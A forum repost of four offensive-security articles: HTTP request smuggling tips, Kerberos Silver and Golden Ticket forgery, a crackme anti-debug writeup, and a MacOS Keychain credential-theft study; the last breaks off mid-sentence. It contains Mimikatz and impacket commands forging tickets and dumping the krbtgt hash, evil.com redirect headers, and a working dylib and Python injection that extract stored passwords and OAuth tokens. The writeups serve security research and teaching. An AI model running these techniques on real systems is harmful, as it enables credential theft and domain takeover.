Nytro

HTTP Request Smuggling – 5 Practical Tips When James Kettle (@albinowax) from PortSwigger published his ground-breaking research on HTTP request smuggling six months ago, I did not immediately delve into the details of it. Instead, I ignored what was clearly a complicated type of attack for a couple of months until, when the time came for me to advise a client on their infrastructure security, I felt I better made sure I understood what all the fuss was about. Since then, I have been able to leverage the technique in a number of nifty scenarios with varying results. This post focuses on a number of practical considerations and techniques that I have found useful when investigating the impact of the attack against servers and websites that were found to be vulnerable. If you are unfamiliar with HTTP request smuggling, I strongly recommend you read up on the topic in order to better understand what follows below. These are the two absolute must-reads: HTTP Desync Attacks: Request Smuggling Reborn HTTP Desync Attacks: what happened next Recap As a recap, there are some key topics that you need to grasp when talking about request smuggling as a technique: Desynchronization At the heart of a HTTP request smuggling vulnerability is the fact that two communicating servers are out of sync with each other: upon receiving a HTTP request message with a maliciously crafted payload, one server will interpret the payload as the end of the request and move on to the “next HTTP request” that is embedded in the payload, while the second will interpret it as a single HTTP request, and handle it as such. Request Poisoning As a result of a successful desynchronization attack, an attacker can poison the response of the HTTP request that is appended to the malicious payload. For example, by embedding a smuggled HTTP request to a page evil.html, an unsuspecting user might get the response of the evil page, rather than the actual response to a request they sent to the server. Smuggling result The result of a successful HTTP smuggling attack will depend heavily on how the server and the client respond to the poisoned request. For example, a successful attack against a static website that hosts a single image file will have a very different impact than successfully targeting a dynamic web application with thousands of concurrent active users. To some extent, you might be able to control the result of your smuggling attack, but in some cases you might be unlucky and need to conclude that the impact of the attack is really next to none. Practical tips By and large, I can categorize my experiences with successful request smuggling attacks in two categories: exploiting the application logic, and exploiting server redirects. When targeting a vulnerable website with a rich web application, it is often possible to exfiltrate sensitive information through the available application features. If any information is stored for you to retrieve at a later point in time (think of a chat, profile description, logs, ….) you might be able to store full HTTP requests in a place where you can later read them. When leveraging server redirects, on the other hand, you need to consider two things to build a decent POC: a redirect needs to be forced, and it should point to an attacker-controlled server in order to have an impact. Below are five practical tips that I found useful in determining the impact of a HTTP request smuggling vulnerability. #1 – Force a redirect Before even trying to smuggle a malicious payload, it is worth establishing what payload will help you achieve the desired result. To test this, I typically end up sending a number of direct requests to the vulnerable server, to see how it handles edge cases. When you find a requests that results in a server direct (HTTP status code 30X), you can move on to the next step. Some tests I have started to incorporate in my routine when looking for a redirect are: /aspnet_client on Microsoft IIS will always append a trailing slash and redirect to/aspnet_client/ Some other directories that tend to do this are /content, /assets,/images, /styles, … Often http requests will redirect to https I found one example where the path of the referer header was used to redirect back to, i.e. Referer: https://www.company.com//abc.burpcollaborator.net/hacked would redirect to //abc.burpcollaborator.net/hacked Some sites will redirect all files with a certain file extensions, e.g. test.php to test.aspx #2 – Specify a custom host When you found a request that results in a redirect, the next step is to determine whether you can force it to redirect to a different server. I have been able to achieve this by trying each of the following: Override the hostname that the server will parse in your smuggled request by including any of the following headers and investigating how the server responds to them: Host: evil.com X-Host: evil.com X-Forwarded-Host: evil.com Similarly, it might work to include the overridden hostname in the first line of the smuggled request: GET http://evil.com/ HTTP/1.1 Try illegally formatting the first line of the smuggled request: GET .evil.com HTTP/1.1 will work if the server appends the URI to the existing hostname: Location: https://vulnerable.com.evil.com #3 – Leak information Regardless of whether you were able to issue a redirect to an attacker-controlled server, it’s worth investigating the features of the application running on the vulnerable server. This heavily depends on the type of application you are targeting, but a few pointers of things you might look for are: Email features – see if you can define the contents of an email of which receive a copy; Chat features – if you can append a smuggled request, you may end up reading the full HTTP request in your chat window; Update profile (name, description, …) – any field that you can write and read could be useful, as long as it allows special and new-line characters; Convert JSON to a classic POST body – if you want to leverage an application feature, but it communicates via JSON (e.g. {"a":"b", "c":"3"}), see if you can change the encoding to a classic a=b&c=3 format with the header Content-Type: application/x-www-form-urlencoded. #4 – Perfect your smuggled request If you are facing issues when launching a smuggling attack, and you don’t see your expected redirect but are facing unexpected error codes (e.g. 400 Bad Request), you may need to put some more information in your smuggled request. Some servers fail when it cannot find expected elements in the HTTP request. Here are some things that sometimes work: Define Content-length and Content-Type headers; Ensure you set Content-Type to application/x-www-form-urlencoded if you are smuggling a POST request; Play with the content length of the smuggled request. In a lot of cases, by increasing or decreasing the smuggled content length, the server will respond differently; Switch GET to POST request, because some servers don’t like GET requests with a non-zero length body. Make sure the server does not receive multiple Host headers, i.e. by pushing the appended request into the POST body of your smuggled request; Sometimes it helps to troubleshoot these kinds of issues if you can find a different page that reflects your poisoned HTTP request, e.g. look for pages that return values in POST bodies, for example an error page with an error message. If you can read the contents of your relayed request, you might figure out why your payload is not accepted by the server; If the server is behind a typical load-balancer like CloudFlare, Akamai or similar, see if you can find its public IP via a service like SecurityTrails and point the HTTP request smuggling attack directly to this “backend”; I have seen cases where the non-encrypted (HTTP) service listening on the server is vulnerable to HTTP request smuggling attacks, whereas the secure channel (HTTPS) service isn’t, and the other way around. Ensure you test both separately and make sure you investigate the impact of both services separately. For example, when HTTP is vulnerable, but all application logic is only served on HTTPS pages, you will have a hard time abusing application logic to demonstrate impact. #5 – Build a good POC If you are targeting application logic and you can exfiltrate the full HTTP body of arbitrary requests, that basically boils down to a session hijacking attack of arbitrary victims hitting your poisoned requests, because you can view the session cookies in the request headers and are not hindered by browser-side mitigations like the http-only flag in a typical XSS scenario. This is the ideal scenario from an attacker’s point of view; When you found a successful redirect, try poisoning a few requests and monitor your attacker server to see what information is sent to your server. Typically a browser will not include session cookies when redirecting the client to a different domain, but sometimes headless clients are less secure: they may not expect redirects, and might send sensitive information even when redirected to a different server. Make sure to inspect GET parameters, POST bodies and request headers for juicy information; When a redirect is successful, but you are not getting anything sensitive your way, find a page that includes JavaScript files to turn the request poisoning into a stored XSS, ensure your redirect points to a JavaScript payload (e.g. https://xss.honoki.net/), and create a POC that generates a bunch of iframes with the vulnerable page while poisoning the requests, until one of the <script> tags ends up hitting the poisoned request, and redirects to the malicious script; If the target is as static as it gets, and you cannot find a redirect, or there isn’t a page that includes a local JavaScript file, consider holding on to the vulnerability in case you can chain it with a different one instead of reporting it as is. Most bug bounty programs will not accept or reward a HTTP request smuggling vulnerability if you cannot demonstrate a tangible impact. Finally, keep in mind to act responsibly when testing for HTTP request smuggling, and always consider the impact on production services. When in doubt, reach out to the people running the show to ensure you are not causing any trouble. Sursa: https://honoki.net/2020/02/18/http-request-smuggling-5-practical-tips/

Silver & Golden Tickets 15 Jan 2020 · 13 min Author : Pixis Active Directory Windows In this post » PAC » Silver Ticket » Golden Ticket » Encryption methods » Conclusion » Resources Now that we have seen how Kerberos works in Active Directory, we are going to discover together the notions of Silver Ticket and Golden Ticket. To understand how they work, it is necessary to primary focus on the PAC (Privilege Attribute Certificate). PAC PAC is kind of an extension of Kerberos protocol used by Microsoft for proper rights management in Active Directory. The KDC is the only one to really know everything about everyone. It is therefore necessary for it to transmit this information to the various services so that they can create security tokens adapted to the users who use these services. Note : Microsoft uses an existing field in the tickets to store information about the user. This field is “authorization-data”. So it’s not an “extension” per say There is a lot of information about the user in his PAC, such as his name, ID, group membership, security information, and so on. The following is a summary of a PAC found in a TGT. It has been simplified to make it easier to understand. AuthorizationData item ad-type: AD-Win2k-PAC (128) Type: Logon Info (1) PAC_LOGON_INFO: 01100800cccccccce001000000000000000002006a5c0818... Logon Time: Aug 17, 2018 16:25:05.992202600 Romance Daylight Time Logoff Time: Infinity (absolute time) PWD Last Set: Aug 16, 2018 14:13:10.300710200 Romance Daylight Time PWD Can Change: Aug 17, 2018 14:13:10.300710200 Romance Daylight Time PWD Must Change: Infinity (absolute time) Acct Name: pixis Full Name: pixis Logon Count: 7 Bad PW Count: 2 User RID: 1102 Group RID: 513 GROUP_MEMBERSHIP_ARRAY Referent ID: 0x0002001c Max Count: 2 GROUP_MEMBERSHIP: Group RID: 1108 Attributes: 0x00000007 .... .... .... .... .... .... .... .1.. = Enabled: The enabled bit is SET .... .... .... .... .... .... .... ..1. = Enabled By Default: The ENABLED_BY_DEFAULT bit is SET .... .... .... .... .... .... .... ...1 = Mandatory: The MANDATORY bit is SET GROUP_MEMBERSHIP: Group RID: 513 Attributes: 0x00000007 .... .... .... .... .... .... .... .1.. = Enabled: The enabled bit is SET .... .... .... .... .... .... .... ..1. = Enabled By Default: The ENABLED_BY_DEFAULT bit is SET .... .... .... .... .... .... .... ...1 = Mandatory: The MANDATORY bit is SET User Flags: 0x00000020 User Session Key: 00000000000000000000000000000000 Server: DC2016 Domain: HACKNDO SID pointer: Domain SID: S-1-5-21-3643611871-2386784019-710848469 (Domain SID) User Account Control: 0x00000210 .... .... .... ...0 .... .... .... .... = Don't Require PreAuth: This account REQUIRES preauthentication .... .... .... .... 0... .... .... .... = Use DES Key Only: This account does NOT have to use_des_key_only .... .... .... .... .0.. .... .... .... = Not Delegated: This might have been delegated .... .... .... .... ..0. .... .... .... = Trusted For Delegation: This account is NOT trusted_for_delegation .... .... .... .... ...0 .... .... .... = SmartCard Required: This account does NOT require_smartcard to authenticate .... .... .... .... .... 0... .... .... = Encrypted Text Password Allowed: This account does NOT allow encrypted_text_password .... .... .... .... .... .0.. .... .... = Account Auto Locked: This account is NOT auto_locked .... .... .... .... .... ..1. .... .... = Don't Expire Password: This account DOESN'T_EXPIRE_PASSWORDs .... .... .... .... .... ...0 .... .... = Server Trust Account: This account is NOT a server_trust_account .... .... .... .... .... .... 0... .... = Workstation Trust Account: This account is NOT a workstation_trust_account .... .... .... .... .... .... .0.. .... = Interdomain trust Account: This account is NOT an interdomain_trust_account .... .... .... .... .... .... ..0. .... = MNS Logon Account: This account is NOT a mns_logon_account .... .... .... .... .... .... ...1 .... = Normal Account: This account is a NORMAL_ACCOUNT .... .... .... .... .... .... .... 0... = Temp Duplicate Account: This account is NOT a temp_duplicate_account .... .... .... .... .... .... .... .0.. = Password Not Required: This account REQUIRES a password .... .... .... .... .... .... .... ..0. = Home Directory Required: This account does NOT require_home_directory .... .... .... .... .... .... .... ...0 = Account Disabled: This account is NOT disabled This PAC is found in every tickets (TGT or TGS) and is encrypted either with the KDC key or with the requested service account’s key. Therefore the user has no control over this information, so he cannot modify his own rights, groups, etc. This structure is very important because it allows a user to access (or not access) a service, a resource, to perform certain actions. The PAC can be considered as the user’s security badge: He can use it to open doors, but he cannot open doors to which he does not have access. Silver Ticket When a customer needs to use a service, he asks for a TGS (Ticket Granting Service) to the KDC. This process goes through two requests KRB_TGS_REQ and KRB_TGS_REP. As a reminder, here is what a TGS looks like schematically. It is encrypted with the NT hash of the account that is running the service (machine account or user account). Thus, if an attacker manages to extract the password or NT hash of a service account, he can then forge a service ticket (TGS) by choosing the information he wants to put in it in order to access that service, without asking the KDC. It is the attacker who builds this ticket. It is this forged ticket that is called Silver Ticket. Let’s take as an example an attacker who finds the NT hash of DESKTOP-01 machine account (DESKTOP-01$). The attacker can create a block of data corresponding to a ticket like the one found in KRB_TGS_REP. He will specify the domain name, the name of the requested service (its SPN - Service Principal Name), a username (which he can choose arbitrarily), his PAC (which he can also forge). Here is a simplistic example of a ticket that the attacker can create: realm : adsec.local sname : cifs\desktop-01.adsec.local enc-part : # Encrypted with compromised NT hash key : 0x309DC6FA122BA1C # Arbitrary session key crealm : adsec.local cname : pixisAdmin authtime : 2050/01/01 00:00:00 # Ticket validity date authorization-data : Forged PAC where, say, this user is Domain Admin Once this structure is created, the user encrypts the enc-part block with the compromised NT hash, then it can create a KRB_AP_REQ from scratch. He just has to send this ticket to the targeted service, along with an authenticator that he encrypts with the session key he arbitrarily chose in the TGS. The service will be able to decrypt the TGS, extract the session key, decrypt the authenticator and provide the service to the user since the information forged in the PAC indicates that the user is a Domain Admin, and this service allows Domain Admins to use it. That seems great, right? Only… the PAC is double signed. The first signature uses service account’s secret, but the second uses domain controller’s secret (krbtgt account’s secret). The attacker only knows the service account’s secret, so he is not able to forge the second signature. However, when the service receives this ticket, it usually verifies only the first signature. This is because service accounts with SeTcbPrivilege, accounts that can act as part of the operating system (for example the local SYSTEM account), do not verify the Domain Controller’s signature. That’s very convenient from an attacker’s perspective! It also means that even if krbtgt password is changed, Silver Tickets will still work, as long as the service’s password doesn’t change. Here is a schematic summarizing the attack: In practice, here is a screenshot showing the creation of a Silver Ticket with Mimikatz tool developed by Benjamin Delpy (@gentilkiwi). Here’s the command line used in Mimikatz: kerberos::golden /domain:adsec.local /user:random_user /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:0123456789abcdef0123456789abcdef /target:DESKTOP-01.adsec.local /service:cifs /ptt This command line creates a ticket for adsec.local domain with an arbitrary username (random_user), and targets CIFS service of DESKTOP-01 machine by providing its NT hash. It is also possible to create a Silver Ticket under linux using impaket, via ticketer.py. ticketer.py -nthash 0123456789abcdef0123456789abcdef -domain-sid S-1-5-21-1423455951-1752654185-1824483205 -domain adsec.local -spn CIFS/DESKTOP-01.adsec.local random_user Then export the ticket path into a special environment variable called KRB5CCNAME. export KRB5CCNAME='/path/to/random_user.ccache' Finally, all the tools from impacket can be used with this ticket, via the -k option. psexec.py -k DESKTOP-01.adsec.local Golden Ticket We have seen that with a Silver Ticket, it was possible to access a service provided by a domain account if that account was compromised. The service accepts information encrypted with its own secret, since in theory only the service itself and the KDC are aware of this secret. This is a good start, but we can go further. By building a Silver Ticket, the attacker gets rid of the KDC since in reality, the user’s real PAC contained in his TGT does not allow him to perform all the actions he wants. To be able to modify the TGT, or forge a new one, one would need to know the key that encrypted it, i.e. the KDC key. This key is in fact the hash of the krbtgt account. This account is a simple account, with no particular rights (at system or Active Directory level) and is even disabled. This low exposure makes it better protected. If an attacker ever manages to find the secret’s hash of this account, he will then be able to forge a TGT with an arbitrary PAC. And that’s kind of like the Holy Grail. Just forge a TGT stating that the user is part of “Domain Admins” group, and that’s it. With such a TGT in his hands, the user can ask the KDC for any TGS for any service. These TGSs will have a copy of the PAC that the attacker has forged, certifying that he is a Domain Admin. It is this forged TGT that is called Golden Ticket. In practice, here is a demonstration of how to create a Golden Ticket. First, we are in a session that does not have a cached ticket, and does not have the rights to access C$ share on the domain controller \\DC-01.adsec.local\C$. We then generate the Golden Ticket using the NT hash of the account krbtgt. Here’s the command line used in Mimikatz: /kerberos::golden /domain:adsec.local /user:random_user /sid:S-1-5-21-1423455951-1752654185-1824483205 /krbtgt:0123456789abcdef0123456789abcdef /ptt This command line creates a ticket for adsec.local domain with an arbitrary username (random_user), by providing the NT hash of krbtgt user. It creates a TGT with a PAC indicating that we are Domain Admin (among other things), and that we are called random_user (arbitrarily chosen). Once we have this ticket in memory, our session is able to request a TGS for any SPN, e.g. for CIFS\DC-01.adsec.local to read the contents of the share \\DC-01.adsec.local\C$. It is also possible to create a Golden Ticket under linux using impaket, via ticketer.py. ticketer.py -nthash 0123456789abcdef0123456789abcdef -domain-sid S-1-5-21-1423455951-1752654185-1824483205 -domain adsec.local random_user Then export the ticket path into the same special environment variable as before, called KRB5CCNAME. export KRB5CCNAME='/chemin/vers/random_user.ccache' Finally, all the tools from impacket can be used with this ticket, via the -k option. secretsdump.py -k DC-01.adsec.local -just-dc-ntlm -just-dc-user krbtgt Encryption methods Until now, we used NT hashes to create Silver/Golden Tickets. In reality, this means that we were using the RC4_HMAC_MD5 encryption method, but it’s not the only one available. Today, there are several encryption methods possible within Active Directory because they have evolved with versions of Windows. Here is a summary table from the Microsoft documentation The desired encryption method can be used to generate the TGT. The information can be found in EType field associated with the TGT. Here is an example using AES256 encryption. Furthermore, according to the presentation Evading Microsoft ATA for Active Directory Domination from Nikhil Mittal at Black Hat, this would allow not to be detected by Microsoft ATA, for the moment, since one avoids making a downgrade of encryption method. By default, the encryption method used is the strongest supported by the client. Conclusion This article clarifies the concepts of PAC, Silver Ticket, Golden Ticket, as well as the different encryption methods used in authentication. These notions are essential to understand Kerberos attacks in Active Directory. Feel free to leave a comment or find me on my Discord server if you have any questions or ideas! Resources FRENCH - Secrets d’authentification épisode II Kerberos contre-attaque - Aurélien Bordes ADSecurity - Pyrotek3 FRENCH - Kerberos Exploration - Rémi Vernier Network security: Configure encryption types allowed for Kerberos Encryption Type Selection in Kerberos Exchanges - Microsoft Sursa: https://en.hackndo.com/kerberos-silver-golden-tickets/

EXTORY's Crackme by Suraj Malhotra Feb 18, 2020 This will be a detailed writeup of EXTORY crackme from crackmes.one. As always I’ll try to make it easy to understand as much as possible so It’ll be longer than usual (with more than 30 screenshots XD). Also Make sure to leave some feedback as it took much more time as compared to my previous writeups. TLDR; Basically this crackme has 4 anti-debug checks(acc. to me). And I think its hard to solve it statically. There are many techniques that is often found in malwares. So it is worth to check it out. If you have not tried it, I’d advice you to please do and then continue with this writeup. I’ve also used a no. of tools for different purposes. Challenge Download EXTORY’s Crackme Initial Analysis As usual, We have to guess the right password and it will show the ‘Correct’ text in the app. For this I used DIE tool. Its a 64bit exe and uses MSVCP. So I began by searching for some strings and found that there is no ‘Correct’ and ‘Wrong’ string. But searching in Unicode strings I found some interesting stuff. Also In crypto tab we find an anti-debug technique. Cool, Now its time to hop over to IDA. Make sure to enable UNICODE strings. So we find their references and I observed that there is some thread stuff. After that I find that the ExitCode of that Thread is being compared to 1 and if its true we continue to use some ‘hgblelelbkjjgldd’ else ‘hielblaldkdd’. Ahh it seems like these could be our ‘Correct’ and ‘Wrong’ strings but encrypted. Now We can switch over to our nice Decompiler View to get more insight into this encryption function and maybe our password is encrypted in the same way. We can observe that WaitForSingleObject is called which checks whether the function has exited then the handle to the thread and the pointer to variable which stores the exitcode is passed to the GetExitCodeThread function. And Finally it compares the exitcode to 1. The decryption algo is pretty simple and the same for both the strings. It is as follows: (enc + 10 * enc[i+1] - 1067) So I wrote a short python script to break it down what it does. It is self explanatory. enc = "hgblelelbkjjgldd" #Correct! #enc = "hielblaldkdd" Wrong! dec = "" v23 = len(enc) v25 = 0 while(v25 < v23): c = ord(enc[v25]) d = ord(enc[v25+1]) v27 = c + 10 * d; v25 += 2; dec += chr(v27-1067) print dec So now whats next? Well I started to study the decompiled code of the Thread which does all the work in this crackme. But It was troublesome to analyse it further statically so I used IDA to debug it. So I placed a breakpoint just before the execution of the thread and it exited Dynamic Analysis So In this tutorial/writeup I’ll toggle between IDA and x64dbg as it becomes more easy to understand and patch it at the same time. Also first things first.. You should disable ASLR with the help of CFF Explorer. Just uncheck the DLL can move option and save the executable. Now load the exe in x64dbg and just keep on stepping. By Trial and Error we get to know that the fcn.1000 is responsible for closing our debugger. We step into it and again find another function ie. fcn.1D10 and please keep in mind keep on saving our database so that our breakpoints are remembered by x64dbg. We now step within the fcn.1D10 function and start analysing it as it looks interesting. At the very beginning it calls a function 4 times ie. fcn.2050 It’d be easy to just look into IDA’s decompiled version of the function as it has some weird assembly. Cool The decompiled version matches and some data is passed to the function If you’ll check it, the function is a little bit scary at first. But basically it justs xors the bytes with 0xD9 from the data passed to it and returns it. Like the bytes above decrypts to x64dbg.exe. And after it executes 4 times, the registers look like this and the 4 strings decrypted are : x64dbg.exe Taskmgr.exe javaw.exe ida64.exe Now we continue with the decompiled code and at the last its looking suspicious hmm.. It checks the return code of the fcn.2370 which later decides whether to terminate the process. And the fcn.2370 uses some functions to get the list of running processes. I keep on stepping and find that it finds smss.exe, csrss.exe, wininit.exe, services.exe, winlogon.exe, etc. Reference : https://docs.microsoft.com/en-us/windows/win32/toolhelp/taking-a-snapshot-and-viewing-processes I guess here it simply checks whether the list contains any string which we decrypted previously and decides the return code accordingly. It’ll close every process from those 4 .. Not your current debugger. Patching & Fun Now we can patch the if statement in such a way that it has a minimum effect over the program and also keeping in mind that it should work with and without a debugger. PS We can also just rename our debugger to bypass this check though. In the screenshot above, the TEST EAX,EAX checks whether the return code of fcn.2370 is 0. We want to always skip the terminate instructions so I patched it to a XOR and JMP and saved it. But I guess there is more to it. After executing the patched version the EIP gets to an invalid instruction ie. 0x12345678. Upon analysing it again I found that we still can’t pass the fcn.1000. Just somewhat below the fcn.1D10 in fcn.1000 we get fcn.2540 which does this. Its a very short one and just loads the address of Process Environment Block(ie. value of GS:[60] from the Thread Information Block), loads the byte at 0x2 index ie. BeingDebugged flag. If its true then it will load 0x12345678 into EAX and calls it which halts the program execution. Reference : https://en.wikipedia.org/wiki/Win32_Thread_Information_Block https://www.aldeid.com/wiki/PEB-Process-Environment-Block/BeingDebugged We can simply NOP those MOV and CALL instructions and save it. Ahh There is another too… but this looks same but instead of 0x12345678, it sets EIP to 0xDEADC0DE. This is also just below the previous antidebug check. But it compares some other parts from PEB. So I checked out at 0x20 .. there is FastPebLockRoutine which has the address of fast-locking routine for PEB. I didn’t get anything about why is it comparing bytes at that address to 0x2001. I just nopped the faulty instructions and again saved it. Just to keep a track, this was our 3rd patched exe. Again after executing the patched executable we get another DEADC0DE. This is not cool anymore lol. We can now just check how much DEADC0DE exists. Just Right Click and .. Search for -> Current Module -> Constant And enter DEADC0DE Cool There is only one found. We jump to the location and find that it is pretty much similar to the one we just patched. So we patch it in the same way we did the previous one. And to my surprise it doesn’t halt or exits anymore.. That means we have bypassed all anti-debug checks. KeyGen For getting our correct key, I’ll use IDA WinDebugger as its graph view is helpful for now. Ok, The StartAddress is loaded and passed into CreateThread. So our main function to put a breakpoint is sub.1A30. The first cmp instruction is the same we just patched as you can refer from the multiple nop instructions just after it. After that we have a loop that stores our input_key’s length into rax basically by looping it and checking it against a null byte. And If it is below 0x10 ie. 16 characters it displays wrong_key so the next time I entered something random like hell65abhell78cd. Later it xors our input_key bytes with 0xCD in a loop. And In next loop it xors 16 bytes (step = 2) at var_68 and var_40. And now something obvious happens.. It compares our xored input_key with the bytes we got from xoring var_68 and Var_40. Now we know that it is a simple XOR encryption which we can easily reverse. So I wrote an IDApython script which gets our key. PS The addresses here can vary on your system. v68, v40 = [], [] v68_beg = 0x0020FFEF0 v68_end = v68_beg + 32 v40_beg = 0x0020FFF18 v40_end = v40_beg + 32 for ea in range(v68_beg,v68_end,2): v68.append( Byte(ea) ) for ea in range(v40_beg,v40_end,2): v40.append( Byte(ea) ) key = "" for x,y in zip(v68,v40): key += chr((x^y) ^ 0xCD) print key This outputs 5AquUR%mH4tE=Yn9 And Hey Finally We get the Correct! Text in green. That was very satisfying, I hope the feeling is mutual. See yall in next writeup about another crackme. Next time I’m thinking maybe .NET will be fun. Don’t forget to hit me up on Twitter. Sursa: https://mrt4ntr4.github.io/EXTORY-Crackme/

Getting What You’re Entitled To: A Journey Into MacOS Stored Credentials 21/02/2020 | Author: Admin Introduction Credential recovery is a common tactic for red team operators and of particular interest are persistently stored, remote access credentials as these may provide an opportunity to move laterally to other systems or resources in the network or Cloud. Much research has been done in to credential recovery on Windows, however MacOS tradecraft has been much less explored. In this blog post we will explore how an operator can gain access to credentials stored within MacOS third party apps by abusing surrogate applications for code injection, including a case study of Microsoft Remote Desktop and Google Drive. Microsoft Remote Desktop On using the Remote Desktop app, you will note that it has the ability to store credentials for RDP sessions, as shown below: The stored credentials for these sessions are not visible within the app, but they can be used without elevation or any additional prompts from the user: With this in mind, it stands to reason that the app can legitimately access the stored credentials, and if we have the opportunity to perform code injection, we may be able to leverage this to reveal the plaintext. The first step in exploring how these credentials are being saved is to explore the app’s sandbox container to determine if they exist in the file system in any way. A simple “grep -ir contoso.com *” reveals the string contained within the Preferences/com.microsoft.rdc.mac.plist plist file; converting it to plaintext with plutil -convert xml1 Preferences/com.microsoft.rdc.mac.plist we can explore what’s going on: Inside the plist file we can find various details regarding the credential, but unfortunately no plaintext password; it’d be nice if it were this easy. The next step is to open up the Remote Desktop app inside our disassembler so we can find what’s going on. We know, based on the above, that the saved entries are known as bookmarks within the app, so it doesn’t take long to discover a couple of potentially interesting methods that look like they’re handling passwords: Diving in to the KeychainCredentialLoader::getPasswordForBookmark() method, we can see that, amongst other things, it calls a method called getPassword(): Inside getPassword(), we see it attempts to discover a Keychain item by calling the findPasswordItem() method which uses SecKeychainSearchCreateFromAttributes() to find the relevant Keychain item and eventually copies out its content: Based on what we’ve learned, we now understand that the passwords for the RDP sessions are stored in the Keychain; we can confirm this using the Keychain Access app: However, we can’t actually access the saved password without elevation, or can we? Retrieving the Password Looking at the Access Control tab, we can see that the Microsoft Remote Desktop.app is granted access to this item and doesn’t require the Keychain password to do it: Going back to our original theory, if we can inject into the app then we can piggy back off its access to retrieve this password from the Keychain. However, code injection on MacOS is not so trivial and Apple have done a good job of locking this down when the appropriate security controls are in place, namely SIP and with the appropriate entitlements or with a hardened runtime being enabled. These options prevent libraries that are not signed by Apple or the same team ID as the app from being injected. Fortunately for us, verifying this with codesign -dvvv –entitlements :- /Applications/Microsoft\ Remote\ Desktop.app/Contents/MacOS/Microsoft\ Remote\ Desktop we find that no such protections are in place meaning that we can use the well-known DYLD_INSERT_LIBRARIES technique to inject our dynamic library. A simple dylib to search for the Keychain item based on the discovered bookmarks may look as follows: #import "hijackLib.h" @implementation hijackLib :NSObject -(void)dumpKeychain { NSMutableDictionary *query = [NSMutableDictionary dictionaryWithObjectsAndKeys: (__bridge id)kCFBooleanTrue, (__bridge id)kSecReturnAttributes, (__bridge id)kCFBooleanTrue, (__bridge id)kSecReturnRef, (__bridge id)kCFBooleanTrue, (__bridge id)kSecReturnData, @"dc.contoso.com", (__bridge id)kSecAttrLabel, (__bridge id)kSecClassInternetPassword,(__bridge id)kSecClass, nil]; NSDictionary *keychainItem = nil; OSStatus status = SecItemCopyMatching((__bridge CFDictionaryRef)query, (void *)&keychainItem); if(status != noErr) { return; } NSData* passwordData = [keychainItem objectForKey:(id)kSecValueData]; NSString * password = [[NSString alloc] initWithData:passwordData encoding:NSUTF8StringEncoding]; NSLog(@"%@", password); } @end void runPOC(void) { [[hijackLib alloc] dumpKeychain]; } __attribute__((constructor)) static void customConstructor(int argc, const char **argv) { runPOC(); exit(0); } Compiling up this library and injecting it via DYLD_INSERT_LIBRARIES, we can reveal the plaintext password stored in the Keychain: Google Drive The previous example was relatively trivial as the Remote Desktop app did not incorporate any of the runtime protections to prevent unauthorised code injection. Let’s take a look at another example. If we take a look at the metadata and entitlements for the Google Drive app, we can see that the app uses a hardened runtime: $ codesign -dvvv --entitlements :- '/Applications//Backup and Sync.app/Contents/MacOS/Backup and Sync' Executable=/Applications/Backup and Sync.app/Contents/MacOS/Backup and Sync Identifier=com.google.GoogleDrive Format=app bundle with Mach-O thin (x86_64) CodeDirectory v=20500 size=546 flags=0x10000(runtime) hashes=8+5 location=embedded According to Apple…. The Hardened Runtime, along with System Integrity Protection (SIP), protects the runtime integrity of your software by preventing certain classes of exploits, like code injection, dynamically linked library (DLL) hijacking, and process memory space tampering. My colleague, Adam Chester previously talked about how we can achieve code injection to a surrogate application when these protections aren’t in place, but in this instance the hardened runtime means that if we try the previous DYLD_INSERT_LIBRARIES or Plugins technique described by Adam, it will fail and we can no longer inject in to the process using the loader. But is there an alternate route? Taking a closer look at the Google Drive app, we discover the following in the app’s Info.plist: <key>PyRuntimeLocations</key> <array> <string>@executable_path/../Frameworks/Python.framework/Versions/2.7/Python</string> </array> We also note an additional Python binary in the /Applications/Backup and Sync.app/Contents/MacOS folder: -rwxr-xr-x@ 1 dmc staff 49696 23 Dec 04:00 Backup and Sync -rwxr-xr-x@ 1 dmc staff 27808 23 Dec 04:00 python So what’s going on here is that the Backup and Sync app for Google Drive is actually a python based application, likely compiled using py2app or similar. Let’s look if this offers us any opportunities to perform code injection. Analysis Reviewing the app, we discover the only python source file is ./Resources/main.py which performs the following: from osx import run_googledrive if __name__ == "__main__": run_googledrive.Main() Unfortunately, we can’t just modify this file because it lives inside a SIP protected directory; however, we can simply copy the whole app to a writeable folder and it will maintain the same entitlements and code signature; let’s copy it to /tmp. With the copy of the app in the /tmp folder, we edit the main.py to see if we can modify the Python runtime: if __name__ == "__main__": print('hello hackers') run_googledrive.Main() Running the app, we can see we have Python execution: /t/B/C/Resources $ /tmp/Backup\ and\ Sync.app/Contents/MacOS/Backup\ and\ Sync /tmp/Backup and Sync.app/Contents/Resources/lib/python2.7/site-packages.zip/wx/_core.py:16633: UserWarning: wxPython/wxWidgets release number mismatch hello hackers 2020-02-21 09:11:36.481 Backup and Sync[89239:2189260] GsyncAppDeletegate.py : Finder debug level logs : False 2020-02-21 09:11:36.652 Backup and Sync[89239:2189260] Main bundle path during launch: /tmp/Backup and Sync.app Now that we know we can execute arbitrary python without invalidating the code signature, can we abuse this somehow? Abusing the Surrogate Taking a look in the Keychain, we discover that the app has several stored items, including the following which is labelled as “application password”. The access control is set such that the Google Drive app can recover this without authentication: Let’s look how we can use a surrogate app to recover this. Reviewing how the the app loads its Python packages, we discover the bundled site-packages resource in ./Resources/lib/python2.7/site-packages.zip, if we unpack this we can get an idea of what’s going on. Performing an initial search for “keychain” reveals several modules containing the string, including osx/storage/keychain.pyo and osx/storage/system_storage.pyo; the one we’re interested in is system_storage.pyo, keychain.pyo, which is a Python interface to the keychain_ext.so shared object that provides the native calls to access the Keychain. Decompiling and looking at system_storage.pyo we discover the following: from osx.storage import keychain LOGGER = logging.getLogger('secure_storage') class SystemStorage(object): def __init__(self, system_storage_access=None): pass def StoreValue(self, category, key, value): keychain.StoreValue(self._GetName(category, key), value) def GetValue(self, category, key): return keychain.GetValue(self._GetName(category, key)) def RemoveValue(self, category, key): keychain.RemoveValue(self._GetName(category, key)) def _GetName(self, category, key): if category: return '%s - %s' % (key, category) return key With this in mind, let’s modify the main.py to try retrieve the credentials from the Keychain: from osx import run_googledrive from osx.storage import keychain if __name__ == "__main__": print('[*] Poking your apps') key = “xxxxxxxxx@gmail.com" value = '%s' % (key) print(keychain.GetValue(value)) #run_googledrive.Main() This time when we run the app, we get some data back which appears to be base64 encoded: Let’s dive deeper to find out what this is and whether we can use it. Searching for where the secure_storage.SecureStorage class is used we find the TokenStorage class, which includes the method: def FindToken(self, account_name, category=Categories.DEFAULT): return self.GetValue(category.value, account_name) The TokenStorage class is then used within the common/auth/oauth_utils.pyo module in the LoadOAuthToken 